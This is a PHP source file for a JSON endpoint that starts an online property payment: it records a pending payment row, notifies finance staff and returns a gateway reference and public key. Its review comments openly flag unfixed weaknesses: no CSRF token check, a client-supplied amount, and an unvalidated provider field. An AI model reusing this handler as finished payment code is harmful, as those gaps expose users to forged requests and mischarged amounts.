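<?php
/*
 * Client-facing JSON endpoint that records a payment row in status
 * 'pending_gateway' and returns the reference, gateway public key and client
 * e-mail the browser needs to hand off to the payment provider.
 *
 * POST fields: allocation_id or property_id (one of them required), amount
 * (required, > 0), provider (required), payment_type and client_charge_id
 * (optional). Every branch answers with JSON and exits.
 *
 * NOTE(review): the handler relies on the session cookie alone; there is no
 * CSRF token check. Confirm whether includes/functions.php offers one and add
 * it before the parameters are read.
 * NOTE(review): the amount is client-supplied. The row is only provisional,
 * so the gateway callback presumably reconciles the charged amount against
 * it — verify that before trusting this value anywhere else.
 */
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
require_once __DIR__ . '/includes/db.php';
require_once __DIR__ . '/includes/functions.php';
require_once __DIR__ . '/includes/mailer.php';
header('Content-Type: application/json');

// Only an authenticated user with the 'client' role may initiate a payment.
if (!isset($_SESSION['user_id']) || ($_SESSION['user_role'] ?? '') !== 'client') {
    echo json_encode(['ok' => false, 'error' => 'unauthorized']);
    exit;
}

$uid = (int)$_SESSION['user_id'];
$companyId = function_exists('getCurrentCompanyId') ? (int)getCurrentCompanyId() : 0;

// The deployed schema may lack optional columns, so each one is probed before
// it is referenced in SQL. The helper may be absent on older installs.
$hasCol = static function (string $table, string $column): bool {
    return function_exists('tableHasColumn') && tableHasColumn($table, $column);
};

// Every request field is cast before use. The (string) cast on the text fields
// stops trim() from throwing a TypeError (uncatchable by the Exception handler
// below) when a client submits an array instead of a scalar.
$allocId        = (int)($_POST['allocation_id'] ?? 0);
$propertyId     = (int)($_POST['property_id'] ?? 0);
$amount         = (float)($_POST['amount'] ?? 0);
$paymentType    = strtolower(trim((string)($_POST['payment_type'] ?? '')));
$clientChargeId = (int)($_POST['client_charge_id'] ?? 0);
$provider       = strtolower(trim((string)($_POST['provider'] ?? '')));
$pubKey = getSetting('gateway_public_key', '');

try {
    // Reject a missing target, a non-positive or non-finite amount (a string
    // such as "1e400" casts to INF and passes a plain <= 0 test), or no provider.
    if (($allocId <= 0 && $propertyId <= 0) || $amount <= 0 || !is_finite($amount) || $provider === '') {
        echo json_encode(['ok'=>false, 'error'=>'invalid_params']);
        exit;
    }
    // NOTE(review): $provider is stored verbatim in the method column and its
    // first three letters become the reference prefix, but it is never matched
    // against the configured gateway(s). An allow-list here would be safer.

    $allocIdFinal = 0;
    $propertyIdFinal = 0;
    $propertyTitle = '';

    if ($allocId > 0) {
        // Allocation path: the allocation must belong to this user (and to the
        // current company when the schema is multi-tenant); the property is
        // taken from the allocation rather than from the request.
        $q = "SELECT a.id, a.property_id, p.title AS property_title FROM allocations a LEFT JOIN properties p ON a.property_id = p.id WHERE a.id = ? AND a.user_id = ?";
        $p = [$allocId, $uid];
        if ($companyId && $hasCol('allocations', 'company_id')) {
            $q .= " AND a.company_id = ?";
            $p[] = $companyId;
        }
        $q .= " LIMIT 1";
        $st = $pdo->prepare($q);
        $st->execute($p);
        $row = $st->fetch(PDO::FETCH_ASSOC) ?: [];
        if (empty($row)) {
            echo json_encode(['ok'=>false, 'error'=>'invalid_allocation']);
            exit;
        }
        $allocIdFinal = (int)($row['id'] ?? 0);
        $propertyIdFinal = (int)($row['property_id'] ?? 0);
        $propertyTitle = trim((string)($row['property_title'] ?? ''));
    } else {
        // Property path: any property visible to the company (or with no
        // company) may be paid for; the user's most recent allocation on it is
        // attached when one exists.
        $q = "SELECT id, title FROM properties WHERE id = ?";
        $p = [$propertyId];
        if ($companyId && $hasCol('properties', 'company_id')) {
            $q .= " AND (company_id = ? OR company_id IS NULL)";
            $p[] = $companyId;
        }
        $q .= " LIMIT 1";
        $st = $pdo->prepare($q);
        $st->execute($p);
        $row = $st->fetch(PDO::FETCH_ASSOC) ?: [];
        if (empty($row)) {
            echo json_encode(['ok'=>false, 'error'=>'invalid_property']);
            exit;
        }
        $propertyIdFinal = (int)($row['id'] ?? 0);
        $propertyTitle = trim((string)($row['title'] ?? ''));

        // Best effort: if this lookup fails the payment is simply recorded
        // without an allocation link.
        try {
            if ($propertyIdFinal > 0 && $hasCol('allocations', 'property_id')) {
                $qa = "SELECT id FROM allocations WHERE user_id = ? AND property_id = ?";
                $pa = [$uid, $propertyIdFinal];
                if ($companyId && $hasCol('allocations', 'company_id')) {
                    $qa .= " AND company_id = ?";
                    $pa[] = $companyId;
                }
                $qa .= " ORDER BY id DESC LIMIT 1";
                $as = $pdo->prepare($qa);
                $as->execute($pa);
                $allocIdFinal = (int)($as->fetchColumn() ?: 0);
            }
        } catch (Throwable $e) {
            $allocIdFinal = 0;
        }
    }

    // Reference handed to the gateway and later used to find this row.
    // random_int() replaces mt_rand(): the suffix is part of an externally
    // visible identifier and should not come from a seedable generator.
    // NOTE(review): four digits allow only 10^4 distinct suffixes per second;
    // confirm the reference column is unique (or the callback also matches on
    // user_id) so two requests in the same second cannot be confused.
    $ref = strtoupper(substr($provider, 0, 3)) . '-' . date('YmdHis') . '-' . random_int(1000, 9999);

    // Build the INSERT from fixed column names only; all values are bound.
    $cols = ['user_id', 'amount', 'status'];
    $vals = [$uid, $amount, 'pending_gateway'];
    if ($allocIdFinal > 0 && $hasCol('payments', 'allocation_id')) {
        $cols[] = 'allocation_id';
        $vals[] = $allocIdFinal;
    }
    if ($propertyIdFinal > 0 && $hasCol('payments', 'property_id')) {
        $cols[] = 'property_id';
        $vals[] = $propertyIdFinal;
    }
    if ($hasCol('payments', 'method')) {
        $cols[] = 'method';
        $vals[] = 'Gateway-' . ucfirst($provider);
    }
    if ($hasCol('payments', 'reference')) {
        $cols[] = 'reference';
        $vals[] = $ref;
    }
    if ($paymentType !== '' && $hasCol('payments', 'payment_type')) {
        $cols[] = 'payment_type';
        $vals[] = $paymentType;
    }
    if ($clientChargeId > 0 && $hasCol('payments', 'client_charge_id')) {
        $cols[] = 'client_charge_id';
        $vals[] = $clientChargeId;
    }
    $nowTs = date('Y-m-d H:i:s');
    if ($hasCol('payments', 'created_at')) {
        $cols[] = 'created_at';
        $vals[] = $nowTs;
    }
    if ($hasCol('payments', 'date')) {
        // Same calendar day as created_at, taken from the same timestamp.
        $cols[] = 'date';
        $vals[] = substr($nowTs, 0, 10);
    }
    if ($companyId && $hasCol('payments', 'company_id')) {
        $cols[] = 'company_id';
        $vals[] = $companyId;
    }
    $sql = "INSERT INTO payments (" . implode(',', $cols) . ") VALUES (" . implode(',', array_fill(0, count($cols), '?')) . ")";
    $ins = $pdo->prepare($sql);
    $ins->execute($vals);

    // Name and e-mail are read once for the notifications and the response.
    // A failure here must not undo the insert, so defaults are used instead.
    $clientName = 'Client';
    $email = '';
    try {
        $uq = $pdo->prepare("SELECT name, email FROM users WHERE id = ? LIMIT 1");
        $uq->execute([$uid]);
        $user = $uq->fetch(PDO::FETCH_ASSOC) ?: [];
        $clientName = (string)(($user['name'] ?? '') ?: 'Client');
        $email = (string)($user['email'] ?? '');
    } catch (Exception $e) {
        error_log('payment init: user lookup failed: ' . $e->getMessage());
    }

    // Notify finance staff and the client. Notification problems are logged
    // but never fail the request: the payment row already exists.
    try {
        $roles = ['finance', 'finance_officer', 'finance_manager'];
        $placeholders = implode(",", array_fill(0, count($roles), '?'));
        $rq = "SELECT id FROM users WHERE role IN ($placeholders)";
        $rparams = $roles;
        if ($companyId && $hasCol('users', 'company_id')) {
            $rq .= " AND company_id = ?";
            $rparams[] = $companyId;
        }
        $rs = $pdo->prepare($rq);
        $rs->execute($rparams);
        $recips = $rs->fetchAll(PDO::FETCH_COLUMN);

        // Human-readable label for the thing being paid for, most specific first.
        if ($propertyTitle !== '') {
            $subject = $propertyTitle;
        } elseif ($propertyIdFinal > 0) {
            $subject = 'Property #' . $propertyIdFinal;
        } elseif ($allocIdFinal > 0) {
            $subject = 'Allocation #' . $allocIdFinal;
        } else {
            $subject = 'Property';
        }

        foreach ($recips as $rid) {
            sendNotification((int)$rid, 'gateway_payment_initiated', $clientName . " initiated online payment for " . $subject . " NGN " . number_format($amount, 2) . " Ref " . $ref, $pdo);
        }
        sendNotification($uid, 'payment_initiated', "You initiated an online payment for " . $subject . ". Reference: " . $ref, $pdo);
    } catch (Exception $e) {
        error_log('payment init: notification failed: ' . $e->getMessage());
    }

    echo json_encode(['ok'=>true, 'reference'=>$ref, 'public_key'=>$pubKey, 'email'=>$email]);
    exit;
} catch (Throwable $e) {
    // Throwable rather than Exception: a TypeError or driver Error would
    // otherwise surface as an HTML stack trace on a JSON endpoint.
    error_log('payment init failed: ' . $e->getMessage());
    echo json_encode(['ok'=>false, 'error'=>'server_error']);
    exit;
}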